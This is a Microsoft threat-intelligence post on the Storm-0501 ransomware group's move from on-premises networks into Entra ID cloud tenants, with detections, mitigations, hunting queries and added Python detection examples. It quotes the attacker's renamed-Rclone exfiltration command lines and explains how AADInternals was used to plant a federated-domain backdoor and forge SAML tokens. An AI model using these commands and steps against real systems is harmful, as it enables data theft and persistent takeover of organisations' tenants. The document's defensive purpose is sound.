Storm-0501: Ransomware attacks expanding to hybrid cloud environments http://approjects.co.za/?big=en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/ Thu, 26 Sep 2024 17:00:00 +0000 Microsoft has observed the threat actor tracked as Storm-0501 launching a multi-staged attack where they compromised hybrid cloud environments and performed lateral movement from on-premises to cloud environment, leading to data exfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment. The said attack targeted multiple sectors in the United States, including government, manufacturing, transportation, […]

The post Storm-0501: Ransomware attacks expanding to hybrid cloud environments appeared first on Microsoft Security Blog.

Microsoft has observed the threat actor tracked as Storm-0501 launching a multi-staged attack where they compromised hybrid cloud environments and performed lateral movement from on-premises to cloud environment, leading to data exfiltration, credential theft, tampering, persistent backdoor access, and ransomware deployment. The said attack targeted multiple sectors in the United States, including government, manufacturing, transportation, and law enforcement. Storm-0501 is a financially motivated cybercriminal group that uses commodity and open-source tools to conduct ransomware operations.

Storm-0501 has been active as early as 2021, initially observed deploying the Sabbath (54bb47h) ransomware in attacks targeting US school districts, publicly leaking data for extortion, and even directly messaging school staff and parents. Since then, most of the threat actor’s attacks have been opportunistic, as the group began operating as a ransomware-as-a-service (RaaS) affiliate, deploying multiple ransomware payloads developed and maintained by other threat actors over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and most recently, Embargo ransomware. The threat actor was also recently observed targeting hospitals in the US.

Storm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from organizations’ on-premises environment to cloud environments. They stole credentials and used them to gain control of the network, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises environment. Microsoft previously observed threat actors such as Octo Tempest and Manatee Tempest targeting both on-premises and cloud environments and exploiting the interfaces between the environments to achieve their goals.

As hybrid cloud environments become more prevalent, the challenge of securing resources across multiple platforms grows ever more critical for organizations. Microsoft is committed to helping customers understand these attacks and build effective defenses against them.

In this blog post, we will go over Storm-0501’s tactics, techniques, and procedures (TTPs), typical attack methods, and expansion to the cloud. We will also provide information on how Microsoft detects activities related to this kind of attack, as well as provide mitigation guidance to help defenders protect their environment.

A diagram of the Storm-0501 attack chain
Figure 1. Storm-0501 attack chain

Analysis of the recent Storm-0501 campaign

On-premises compromise

Initial access and reconnaissance

Storm-0501 previously achieved initial access through intrusions facilitated by access brokers like Storm-0249 and Storm-0900, leveraging compromised (possibly stolen) credentials to sign in to the target system, or by exploiting various known remote code execution vulnerabilities in unpatched public-facing servers. In a recent campaign, Storm-0501 exploited known vulnerabilities in Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler (CVE-2023-4966), and ColdFusion 2016 application (possibly CVE-2023-29300 or CVE-2023-38203). In cases observed by Microsoft, these initial access techniques, combined with insufficient operational security practices by the targets, provided the threat actor with administrative privileges on the target device.

After gaining initial access and code execution capabilities on the affected device in the network, the threat actor performed extensive discovery to find potential desirable targets such as high-value assets and general domain information like Domain Administrator users and domain forest trust. Common native Windows tools and commands, such as systeminfo.exe, net.exe, nltest.exe, and tasklist.exe, were leveraged in this phase. The threat actor also utilized open-source tools like ossec-win32 and OSQuery to query additional endpoint information. Additionally, in some of the attacks, we observed the threat actor running an obfuscated version of ADRecon.ps1 called obfs.ps1 or recon.ps1 for Active Directory reconnaissance.

Following initial access and reconnaissance, the threat actor deployed several remote monitoring and management tools (RMMs), such as Level.io, AnyDesk, and NinjaOne to interact with the compromised device and maintain persistence.

Credential access and lateral movement

The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods. The threat actor primarily utilized Impacket’s SecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices to obtain credentials. The threat actor used the compromised credentials to access more devices in the network and then leveraged Impacket again to collect additional credentials. The threat actor then repeated this process until they compromised a large set of credentials that potentially included multiple Domain Admin credentials.

In addition, the threat actor was observed attempting to gather secrets by reading sensitive files and in some cases gathering KeePass secrets from the compromised devices. The threat actor used EncryptedStore’s Find-KeePassConfig.ps1 PowerShell script to output the database location and keyfile/user master key information and launch the KeePass executable to gather the credentials. We assess with medium confidence that the threat actor also performed extensive brute force activity on a few occasions to gain additional credentials for specific accounts.

The threat actor was observed leveraging Cobalt Strike to move laterally across the network using the compromised credentials and using the tool’s command-and-control (C2) capabilities to communicate directly with the endpoints and send further commands. The common Cobalt Strike Beacon file types used in these campaigns were .dll files and .ocx files, launched by rundll32.exe and regsvr32.exe respectively. Moreover, the “license_id” associated with this Cobalt Strike Beacon is “666”. The “license_id” setting is commonly referred to as the watermark and is a nine-digit value that is unique per legitimate license provided by Cobalt Strike. In this case, the “license_id” was modified to the three-digit value 666 in all the beacon configurations.
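To make the watermark check concrete, the following Python is an added example (not code from Microsoft’s post) that decodes a Beacon configuration blob and applies the nine-digit watermark convention described above. It assumes the obfuscated config has already been carved out of the Beacon DLL/OCX or from memory; the single-byte XOR keys and the TLV layout (uint16 index, uint16 type, uint16 length, value) are the documented Beacon config format. The sample blob is constructed for this example and is not a real Storm-0501 beacon.

```python
import struct

# Single-byte XOR keys Cobalt Strike uses to obfuscate the embedded Beacon
# configuration: 0x2E for 4.x builds, 0x69 for 3.x builds.
XOR_KEYS = (0x2E, 0x69)

# Subset of the Beacon config setting indices; index 37 is the watermark / license_id.
SETTING_NAMES = {
    1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize", 5: "Jitter",
    7: "PublicKey", 8: "C2Server", 9: "UserAgent", 10: "HttpPostUri",
    37: "Watermark",
}
TYPE_SHORT, TYPE_INT, TYPE_DATA = 1, 2, 3  # value encodings used in the TLV entries


def build_setting(index, typ, value):
    """Encode one config entry: uint16 index, uint16 type, uint16 length, value (big-endian)."""
    if typ == TYPE_SHORT:
        payload = struct.pack(">H", value)
    elif typ == TYPE_INT:
        payload = struct.pack(">I", value)
    else:
        payload = value
    return struct.pack(">HHH", index, typ, len(payload)) + payload


def encode_config(settings, key=0x2E):
    """Build an obfuscated config blob (used here only to construct test input)."""
    raw = b"".join(build_setting(*s) for s in settings) + b"\x00" * 6  # all-zero entry terminates
    return bytes(b ^ key for b in raw)


def parse_config(blob):
    """Try each known XOR key; a genuine config starts with BeaconType (index 1, short, len 2)."""
    for key in XOR_KEYS:
        raw = bytes(b ^ key for b in blob)
        if raw[:6] == b"\x00\x01\x00\x01\x00\x02":
            return _parse_tlv(raw)
    raise ValueError("no Beacon configuration found under known XOR keys")


def _parse_tlv(raw):
    settings, off = {}, 0
    while off + 6 <= len(raw):
        index, typ, length = struct.unpack_from(">HHH", raw, off)
        off += 6
        if index == 0:  # terminator
            break
        data = raw[off:off + length]
        off += length
        if typ == TYPE_SHORT:
            value = struct.unpack(">H", data)[0]
        elif typ == TYPE_INT:
            value = struct.unpack(">I", data)[0]
        else:
            value = data.rstrip(b"\x00").decode("latin-1")
        settings[SETTING_NAMES.get(index, f"Setting{index}")] = value
    return settings


def watermark_verdict(watermark):
    """Apply the nine-digit-per-licence convention described in the text above."""
    if watermark == 0:
        return "zero watermark: trial or cracked build"
    if watermark < 100_000_000:
        return f"{watermark}: fewer than nine digits, not a normal licensed value (the 666 pattern)"
    return f"{watermark}: full-length watermark, check it against known leaked or shared licence IDs"


# Constructed sample blob (not a real beacon): HTTPS beacon on 443 with watermark 666.
SAMPLE_BLOB = encode_config([
    (1, TYPE_SHORT, 8),                               # BeaconType 8 = HTTPS
    (2, TYPE_SHORT, 443),
    (3, TYPE_INT, 60000),                             # 60 s sleep
    (8, TYPE_DATA, b"c2.example.invalid,/updates"),   # hypothetical C2 host and URI
    (37, TYPE_INT, 666),
])

if __name__ == "__main__":
    cfg = parse_config(SAMPLE_BLOB)
    print(cfg)
    print(watermark_verdict(cfg["Watermark"]))
```

In a real investigation the blob is located first (for 4.x beacons, by scanning the binary or a memory dump for the XOR-encoded `00 01 00 01 00 02` header); this parser only covers the decode-and-assess step.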

In cases we observed, the threat actor’s lateral movement across the campaign ended with a Domain Admin compromise and access to a Domain Controller that eventually enabled them to deploy ransomware across the devices in the network.

Data collection and exfiltration

The threat actor was observed exfiltrating sensitive data from compromised devices. To exfiltrate data, the threat actor used the open-source tool Rclone, renamed to known Windows binary names or variations of them, such as svhost.exe or scvhost.exe, as a masquerading technique. The threat actor employed the renamed Rclone binaries to transfer data to the cloud, using a dedicated configuration that synchronized files to public cloud storage services such as MegaSync across multiple threads. The following command lines used by the threat actor demonstrate this behavior:

  • Svhost.exe copy --filter-from [REDACTED] [REDACTED] config:[REDACTED] -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11
  • scvhost.exe --config C:\Windows\Debug\a.conf copy [REDACTED UNC PATH] [REDACTED]
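As an added example (not part of the original post), the following Python applies the three checks a detection engineer would write for this behavior: the PE version-info OriginalFileName still reading rclone.exe after the rename, Rclone command-line grammar (copy/sync verb plus Rclone flags or a `remote:` target) under a non-Rclone name, and near-miss spellings of Windows system binary names. The process events are constructed; the paths and share names stand in for the values redacted above.

```python
import re

# Windows system binaries whose names attackers imitate; an exact match is only
# legitimate from the system directories listed below.
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "smss.exe",
                   "services.exe", "winlogon.exe", "spoolsv.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

RCLONE_FLAGS = re.compile(
    r"--(?:config|transfers|multi-thread-streams|filter-from|ignore-existing|auto-confirm)\b", re.I)
RCLONE_VERB = re.compile(r"\b(?:copy|copyto|sync|move)\b", re.I)
RCLONE_REMOTE = re.compile(r"(?:^|\s)[A-Za-z0-9_-]{2,}:")  # "config:" style remote, not a C: drive


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character typo-squats such as svhost.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(event):
    """Return the reasons a process event looks like renamed Rclone or a masquerading binary."""
    name = event["FileName"].lower()
    path = event["FolderPath"].lower()
    original = (event.get("ProcessVersionInfoOriginalFileName") or "").lower()
    cmd = event.get("ProcessCommandLine", "")
    reasons = []
    # 1. PE version info still says rclone.exe even though the file on disk was renamed.
    if original == "rclone.exe" and name != "rclone.exe":
        reasons.append(f"version info OriginalFileName is rclone.exe but file is named {name}")
    # 2. Rclone command-line grammar under a name that is not rclone.exe.
    if name != "rclone.exe" and RCLONE_VERB.search(cmd) and (
            RCLONE_FLAGS.search(cmd) or RCLONE_REMOTE.search(cmd)):
        reasons.append("command line uses rclone syntax")
    # 3. Name imitates a Windows system binary: exact name outside system dirs, or a near-miss spelling.
    if name in SYSTEM_BINARIES:
        if not path.startswith(SYSTEM_DIRS):
            reasons.append(f"{name} running from non-system path {path}")
    else:
        for sysname in SYSTEM_BINARIES:
            if levenshtein(name, sysname) <= 2:
                reasons.append(f"{name} is a lookalike of {sysname}")
    return reasons


def detect(events):
    """Map FileName -> reasons for every event that triggers at least one rule."""
    hits = {}
    for e in events:
        reasons = assess(e)
        if reasons:
            hits[e["FileName"]] = reasons
    return hits


# Constructed process events (not real telemetry); fields follow DeviceProcessEvents naming.
SAMPLE_EVENTS = [
    {"FileName": "svhost.exe", "FolderPath": "C:\\Windows\\Debug\\svhost.exe",
     "ProcessVersionInfoOriginalFileName": "rclone.exe",
     "ProcessCommandLine": "svhost.exe copy --filter-from C:\\Windows\\Debug\\filter.txt "
                           "\\\\fs01\\finance$ config:stage -q --ignore-existing --auto-confirm "
                           "--multi-thread-streams 11 --transfers 11"},
    {"FileName": "scvhost.exe", "FolderPath": "C:\\Users\\Public\\scvhost.exe",
     "ProcessVersionInfoOriginalFileName": "rclone.exe",
     "ProcessCommandLine": "scvhost.exe --config C:\\Windows\\Debug\\a.conf copy \\\\fs01\\hr$ stage:hr"},
    {"FileName": "svchost.exe", "FolderPath": "C:\\Windows\\System32\\svchost.exe",
     "ProcessVersionInfoOriginalFileName": "svchost.exe",
     "ProcessCommandLine": "svchost.exe -k netsvcs -p"},                      # benign
    {"FileName": "rclone.exe", "FolderPath": "C:\\Program Files\\rclone\\rclone.exe",
     "ProcessVersionInfoOriginalFileName": "rclone.exe",
     "ProcessCommandLine": "rclone.exe sync D:\\backup gdrive:backup --transfers 4"},  # benign, unrenamed
]

if __name__ == "__main__":
    for name, reasons in detect(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```

Rule 1 is the strongest signal and needs version-info fields in your telemetry; rules 2 and 3 still fire when an attacker strips the version resource, which is why the Defender alert “Renaming of legitimate tools for possible data exfiltration” is worth pairing with a lookalike-name check.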

Defense evasion

The threat actor attempted to evade detection by tampering with security products on some of the devices they had hands-on-keyboard access to. They employed an open-source tool, PowerShell cmdlets, and existing binaries to evade detection, and in some cases distributed Group Policy Object (GPO) policies to tamper with security products.

On-premises to cloud pivot

In their recent campaign, we noticed a shift in Storm-0501’s methods. The threat actor used credentials stolen earlier in the attack, specifically Microsoft Entra ID (formerly Azure AD) credentials, to move laterally from the on-premises environment to the cloud and to establish persistent access to the target network through a backdoor.

Storm-0501 was observed using the following attack vectors and pivot points on the on-premises side to gain subsequent control in Microsoft Entra ID:

Microsoft Entra Connect Sync account compromise

Microsoft Entra Connect, previously known as Azure AD Connect, is an on-premises Microsoft application that plays a critical role in synchronizing passwords and sensitive data between Active Directory (AD) objects and Microsoft Entra ID objects. Microsoft Entra Connect synchronizes the on-premises identity and Microsoft Entra identity of a user account to allow the user to sign in to both realms with the same password. To deploy Microsoft Entra Connect, the application must be installed on an on-premises server or an Azure VM. To decrease the attack surface, Microsoft recommends that organizations deploy Microsoft Entra Connect on a domain-joined server and restrict administrative access to domain administrators or other tightly controlled security groups. Microsoft Incident Response also published recommendations on preventing cloud identity compromise.

Microsoft Entra Connect Sync is a component of Microsoft Entra Connect that synchronizes identity data between on-premises environments and Microsoft Entra ID. During the Microsoft Entra Connect installation process, at least two new service accounts responsible for the synchronization are created (more are created if there are multiple forests): one in the on-premises AD realm and the other in the Microsoft Entra ID tenant.

The on-premises account name is prefixed with “MSOL_” and has permissions to replicate directory changes, modify passwords, modify users, modify groups, and more (see full permissions here).

A screenshot of the on-premises account name in Microsoft Entra Connect Sync
Figure 2. The on-premises account name

The cloud Microsoft Entra ID account is prefixed with “sync_<Entra Connect server name>_” and has the account display name set to “On-Premises Directory Synchronization Service Account”. This user account is assigned the Directory Synchronization Accounts role (see detailed permissions of this role here). Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync and helps prevent abuse.

A screenshot of the cloud account name in Microsoft Entra Connect Sync
Figure 3. The cloud account name

The on-premises and cloud service accounts perform the sync operation every few minutes, similar to Password Hash Synchronization (PHS), to keep the user experience close to real time. Both accounts are crucial to Microsoft Entra Connect Sync operations, and their credentials are stored encrypted with DPAPI (Data Protection API) on the server’s disk or on a remote SQL server.

We assess with high confidence that in the recent Storm-0501 campaign, the threat actor specifically located Microsoft Entra Connect Sync servers and managed to extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts. We assess that the threat actor was able to achieve this because of the previous malicious activities described in this blog post, such as using Impacket to steal credentials and DPAPI encryption keys, and tampering with security products.

Following the compromise of the cloud Directory Synchronization Account, the threat actor can authenticate using the clear text credentials and get an access token to Microsoft Graph. The compromise of the Microsoft Entra Connect Sync account presents a high risk to the target, as it can allow the threat actor to set or change Microsoft Entra ID passwords of any hybrid account (on-premises account that is synced to Microsoft Entra ID).

Cloud session hijacking of on-premises user account

Another way to pivot from on-premises to Microsoft Entra ID is to gain control of an on-premises user account that has a respective user account in the cloud. In some of the Storm-0501 cases we investigated, at least one of the Domain Admin accounts that was compromised had a respective account in Microsoft Entra ID, with multifactor authentication (MFA) disabled, and assigned the Global Administrator role. It is important to mention that the sync service is unavailable for administrative accounts in Microsoft Entra, hence the passwords and other data are not synced from the on-premises account to the Microsoft Entra account in this case. However, if the passwords for both accounts are the same, or obtainable through on-premises credential theft techniques (e.g., browser password stores), then the pivot is possible.

If a compromised on-premises user account is not assigned an administrative role in Microsoft Entra ID, is synced to the cloud, and no security boundaries such as MFA or Conditional Access are set, then the threat actor could escalate to the cloud through the following:

  1. If the password is known, then logging in to Microsoft Entra is possible from any device.
  2. If the password is unknown, the threat actor can reset the on-premises user password, and after a few minutes the new password will be synced to the cloud.
  3. If they hold credentials of a compromised Microsoft Entra Directory Synchronization Account, they can set the cloud password using AADInternals’ Set-AADIntUserPassword cmdlet.

If MFA for that user account is enabled, then authentication with the user will require the threat actor to tamper with the MFA or gain control of a device owned by the user and subsequently hijack its cloud session or extract its Microsoft Entra access tokens along with their MFA claims.

MFA is a security practice that requires users to provide two or more verification factors to gain access to a resource and is a recommended security practice for all users, especially for privileged administrators. A lack of MFA or Conditional Access policies limiting the sign-in options opens a wide door of possibilities for the attacker to pivot to the cloud environment, especially if the user has administrative privileges. To increase the security of admin accounts, Microsoft is rolling out additional tenant-level security measures to require MFA for all Azure users.

Impact

Cloud compromise leading to backdoor

Following a successful pivot from the on-premises environment to the cloud through the compromised Microsoft Entra Connect Sync user account or the cloud admin account compromised through cloud session hijacking, the threat actor was able to connect to Microsoft Entra (portal/MS Graph) from any device, using a privileged Microsoft Entra ID account, such as a Global Administrator, and was no longer limited to the compromised devices.

Once Global Administrator access is available to Storm-0501, we observed them creating persistent backdoor access for later use by creating a new federated domain in the tenant. This backdoor enables an attacker to sign in as any user of the compromised Microsoft Entra ID tenant if that user’s ImmutableId property is known or set by the attackers. For users that are configured to be synced by the Microsoft Entra Connect service, the ImmutableId property is automatically populated, while for users that are not synced the default value is null. However, users with administrative privileges can add an ImmutableId value regardless.

The threat actor used the open-source tool AADInternals, and its Microsoft Entra ID capabilities to create the backdoor. AADInternals is a PowerShell module designed for security researchers and penetration testers that provides various methods for interacting and testing Microsoft Entra ID and is commonly used by Storm-0501. To create the backdoor, the threat actor first needed to have a domain of their own that is registered to Microsoft Entra ID. The attacker’s next step is to determine whether the target domain is managed or federated. A federated domain in Microsoft Entra ID is a domain that is configured to use federation technologies, such as Active Directory Federation Services (AD FS), to authenticate users. If the target domain is managed, then the attackers need to convert it to a federated one and provide a root certificate to sign future tokens upon user authentication and authorization processes. If the target domain is already federated, then the attackers need to add the root certificate as “NextSigningCertificate”.

Once a backdoor domain is available for use, the threat actor creates a federation trust between the compromised tenant and their own tenant. The threat actor uses the AADInternals commands that create Security Assertion Markup Language (SAML or SAML2) tokens, which can be used to impersonate any user in the organization and bypass MFA to sign in to any application. Microsoft observed the actor using such SAML tokens to sign in to Office 365.
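As an added example (not code from the post or from AADInternals), the following Python compares two snapshots of a tenant’s domain list, shaped after Microsoft Graph’s domain and internalDomainFederation resources, and flags the changes this backdoor produces: a new or newly federated domain, a changed signingCertificate or an added nextSigningCertificate, a changed issuerUri, and a federation whose federatedIdpMfaBehavior still accepts the federated IdP’s MFA claim (the setting behind the “prevent bypassing of cloud MFA when federated” mitigation listed later). It also lists cloud-only users that carry an onPremisesImmutableId, which are the impersonation candidates described above. The snapshots and users are constructed data; property names are Graph’s, values are not real.

```python
# Snapshot shape follows Microsoft Graph's domain and internalDomainFederation resources
# (property names are Graph's; every value below is constructed for this example).

def diff_federation(before, after):
    """Return (domain, finding) pairs for federation changes that fit the backdoor pattern."""
    findings = []
    before_by_id = {d["id"]: d for d in before}
    for dom in after:
        old = before_by_id.get(dom["id"])
        if old is None:
            findings.append((dom["id"], "new domain added to tenant"))
        elif old["authenticationType"] == "Managed" and dom["authenticationType"] == "Federated":
            findings.append((dom["id"], "domain converted from Managed to Federated"))
        if dom["authenticationType"] != "Federated":
            continue
        fed = dom.get("federation", {})
        if old is not None:
            old_fed = old.get("federation", {})
            # A new signing cert, or one queued as nextSigningCertificate, lets its holder mint tokens.
            for cert_field in ("signingCertificate", "nextSigningCertificate"):
                if fed.get(cert_field) and fed.get(cert_field) != old_fed.get(cert_field):
                    findings.append((dom["id"], f"{cert_field} changed or added"))
            if fed.get("issuerUri") != old_fed.get("issuerUri"):
                findings.append((dom["id"], "issuerUri changed"))
        # Anything other than rejectMfaByFederatedIdp lets a forged SAML token satisfy MFA by claim.
        if fed.get("federatedIdpMfaBehavior") != "rejectMfaByFederatedIdp":
            findings.append((dom["id"], "federatedIdpMfaBehavior trusts the federated IdP's MFA claim"))
    return findings


def suspicious_immutable_ids(users):
    """Cloud-only users that nonetheless carry an onPremisesImmutableId: an attacker-set value
    here is what lets a forged SAML token map onto the account."""
    return [u["userPrincipalName"] for u in users
            if not u.get("onPremisesSyncEnabled") and u.get("onPremisesImmutableId")]


# Constructed snapshots: the tenant before and after the intrusion.
BEFORE = [
    {"id": "contoso.com", "authenticationType": "Managed"},
    {"id": "corp.contoso.com", "authenticationType": "Federated", "federation": {
        "issuerUri": "http://adfs.corp.contoso.com/adfs/services/trust",
        "signingCertificate": "cert:legit-2023", "nextSigningCertificate": None,
        "federatedIdpMfaBehavior": "rejectMfaByFederatedIdp"}},
]
AFTER = [
    {"id": "contoso.com", "authenticationType": "Federated", "federation": {
        "issuerUri": "http://sts.attacker.invalid/adfs/services/trust",
        "signingCertificate": "cert:rogue-2024", "nextSigningCertificate": None,
        "federatedIdpMfaBehavior": "acceptIfMfaDoneByFederatedIdp"}},
    {"id": "corp.contoso.com", "authenticationType": "Federated", "federation": {
        "issuerUri": "http://adfs.corp.contoso.com/adfs/services/trust",
        "signingCertificate": "cert:legit-2023", "nextSigningCertificate": "cert:rogue-2024",
        "federatedIdpMfaBehavior": "rejectMfaByFederatedIdp"}},
    {"id": "backdoor.invalid", "authenticationType": "Federated", "federation": {
        "issuerUri": "http://sts.attacker.invalid/adfs/services/trust",
        "signingCertificate": "cert:rogue-2024", "nextSigningCertificate": None,
        "federatedIdpMfaBehavior": "acceptIfMfaDoneByFederatedIdp"}},
]
USERS = [
    {"userPrincipalName": "alice@contoso.com", "onPremisesSyncEnabled": True,
     "onPremisesImmutableId": "5c1aR0t5fkqHq1b4Uo3yOQ=="},
    {"userPrincipalName": "breakglass@contoso.onmicrosoft.com", "onPremisesSyncEnabled": None,
     "onPremisesImmutableId": None},
    {"userPrincipalName": "ga-admin@contoso.onmicrosoft.com", "onPremisesSyncEnabled": None,
     "onPremisesImmutableId": "ZmFrZWlkMDE="},   # cloud-only account with an ImmutableId set by hand
]

if __name__ == "__main__":
    for domain, finding in diff_federation(BEFORE, AFTER):
        print(f"{domain}: {finding}")
    print("impersonation candidates:", suspicious_immutable_ids(USERS))
```

The “before” snapshot is whatever you last exported from Graph; the same changes surface in audit logs as the “Set domain authentication.” and “Set federation settings on domain.” events used in the hunting query later in this post.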

On-premises compromise leading to ransomware

Once the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to move laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization. We observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained backdoor access to the network.

Embargo ransomware is a new strain developed in Rust, known to use advanced encryption methods. Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom. Embargo affiliates employ double extortion tactics, where they first encrypt a victim’s files and threaten to leak stolen sensitive data unless a ransom is paid.

In the cases observed by Microsoft, the threat actor leveraged compromised Domain Admin accounts to distribute the Embargo ransomware via a scheduled task named “SysUpdate” that was registered via GPO on the devices in the network. The ransomware binaries names that were used were PostalScanImporter.exe and win.exe. Once the files on the target devices were encrypted, the encrypted files extension changed to .partial, .564ba1, and .embargo.

Mitigation and protection guidance

Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync as part of ongoing security hardening. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks.

Customers may also refer to Microsoft’s human-operated ransomware overview for general hardening recommendations against ransomware attacks.

The other techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:

  • Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID environments to slow and stop attackers.
  • Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
    • Set a Conditional Access policy to limit the access of Microsoft Entra ID sync accounts from untrusted IP addresses to all cloud apps. The Microsoft Entra ID sync account is identified by having the role ‘Directory Synchronization Accounts’. Please refer to the Advanced Hunting section and check the relevant query to get those IP addresses.
  • Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
  • Follow Microsoft’s best practices for securing Active Directory Federation Services.  
  • Refer to Azure Identity Management and access control security best practices for further steps and recommendations to manage, design, and secure your Azure AD environment.
  • Ensure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the Microsoft Entra ID sync account and all other users.
  • Enable protection to prevent bypassing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID.
  • Set the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.
  • Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based conditional access policies to remediate risky sign-ins.
  • Turn on tamper protection features to prevent attackers from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.
  • Refer to the recommendations in our attacker technique profile, including use of Windows Defender Application Control or AppLocker to create policies to block unapproved information technology (IT) management tools to protect against the abuse of legitimate remote management tools like AnyDesk or Level.io.
  • Run endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
  • Turn on investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate alerts, significantly reducing alert volume.

Detection details

The following alerts can be used when investigating the current campaign of Storm-0501.

Microsoft Defender XDR detections

Microsoft Defender Antivirus 

Microsoft Defender Antivirus detects the Cobalt Strike Beacon as the following:

Additional Cobalt Strike components are detected as the following:

Microsoft Defender Antivirus detects tools that enable Microsoft Entra ID enumeration as the following malware: 

Embargo Ransomware threat components are detected as the following:

Microsoft Defender for Endpoint 

Alerts with the following titles in the security center can indicate threat activity related to Storm-0501 on your network:

  • Ransomware-linked Storm-0501 threat actor detected

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report. 

  • Possible Adobe ColdFusion vulnerability exploitation
  • Compromised account conducting hands-on-keyboard attack
  • Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
  • Ongoing hands-on-keyboard attack via Impacket toolkit
  • Suspicious Microsoft Defender Antivirus exclusion
  • Attempt to turn off Microsoft Defender Antivirus protection
  • Renaming of legitimate tools for possible data exfiltration
  • BlackCat ransomware
  • ‘Embargo’ ransomware was detected and was active
  • Suspicious Group Policy action detected
  • An active ‘Embargo’ ransomware was detected

The following alerts might indicate on-premises to cloud pivot through Microsoft Entra Connect:

  • Entra Connect Sync credentials extraction attempt
  • Suspicious cmdlets launch using AADInternals
  • Potential Entra Connect Tampering
  • Indication of local security authority secrets theft

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate activity related to this threat:

  • Data exfiltration over SMB
  • Suspected DCSync attack

Microsoft Defender for Cloud Apps

Microsoft Defender for Cloud Apps can detect abuse of permissions in Microsoft Entra ID and other cloud apps. Activities related to the Storm-0501 campaign described in this blog are detected as the following:

  • Backdoor creation using AADInternals tool
  • Compromised Microsoft Entra ID Cloud Sync account
  • Suspicious sign-in to Microsoft Entra Connect Sync account
  • Entra Connect Sync account suspicious activity following a suspicious login
  • AADInternals tool used by a Microsoft Entra Sync account
  • Suspicious login from AADInternals tool

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

  • CVE-2022-47966

Threat intelligence reports 

Microsoft customers can use the following reports in Microsoft Defender Threat Intelligence to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments: 

Advanced hunting 

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Microsoft Entra Connect Sync account exploration

Explore sign-in activity from IdentityLogonEvents and look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are not sync related.

IdentityLogonEvents
| where Timestamp > ago(30d)
| where AccountDisplayName contains "On-Premises Directory Synchronization Service Account"
| extend ApplicationName = tostring(RawEventData.ApplicationName)
| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName, OSPlatform, DeviceType

Usually, the activity of the sync account is repetitive, coming from the same IP address to the same application; any deviation from the natural flow is worth investigating. Cloud applications that are normally accessed by the Microsoft Entra ID sync account are “Microsoft Azure Active Directory Connect”, “Windows Azure Active Directory”, and “Microsoft Online Syndication Partner Portal”.

Explore the cloud activity (that is, ActionType) of the sync account. As above, this account by nature performs a fixed set of actions such as ‘update User.’ and ‘update Device.’. New and uncommon activity from this user might indicate interactive use of the account; even though it could be someone inside the organization, it could also be the threat actor.

CloudAppEvents
| where Timestamp > ago(30d)
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| extend Workload = RawEventData.Workload
| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType, OSPlatform, UserAgent, ISP

Pay close attention to actions from different DeviceTypes or OSPlatforms: this account’s automated service runs from one specific machine, so there shouldn’t be any variety in these fields.
